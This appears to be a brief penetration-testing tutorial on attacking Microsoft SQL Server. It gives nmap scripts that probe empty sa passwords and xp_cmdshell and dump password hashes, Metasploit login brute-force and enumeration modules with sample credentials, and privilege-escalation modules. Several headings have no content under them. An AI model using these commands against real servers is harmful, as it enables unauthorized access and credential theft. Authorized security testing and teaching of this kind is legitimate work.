Today I am writing about how to attack Windows SQL Server remotely. During a penetration test we sometimes find SQL Server instances exposed on the network; here we will learn how to recognize the server, brute force its logins and escalate privileges.
How to Attack Windows SQL Server
Information Gathering
What port is SQL Server running on?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
What version of SQL Server exists?
Scanning SQL Server
msf> use auxiliary/scanner/mssql/mssql_ping
Scanning SQL Server with Nmap
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
Default SQL Server Databases

| Database | Purpose |
|---|---|
| master | Records all the system-level information for an instance of SQL Server. |
| model | Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards. |
| tempdb | Is a workspace for holding temporary objects or intermediate result sets. |
| resource | Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database. |
| msdb | Is used by SQL Server Agent for scheduling alerts and jobs. |
SQL Server Type of Authentication
SQL Server Type of Users
Brute Force SQL Server
hydra
msfconsole script
Search useful Scripts
searchsploit "microsoft sql server"
nmap --script-help "*ms* and *sql*"
msf> search mssql
use auxiliary/scanner/mssql/mssql_login
set rhosts 172.16.64.199
set rport 1433
set username fooadmin
set password fooadmin
set verbose true
run
use auxiliary/admin/mssql/mssql_enum
set rhosts 172.16.64.199
set rport 1433
set username fooadmin
set password fooadmin
run
Useful wordlists
Escalate SQL Server Privileges
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
msf> use auxiliary/admin/mssql/mssql_escalate_execute_as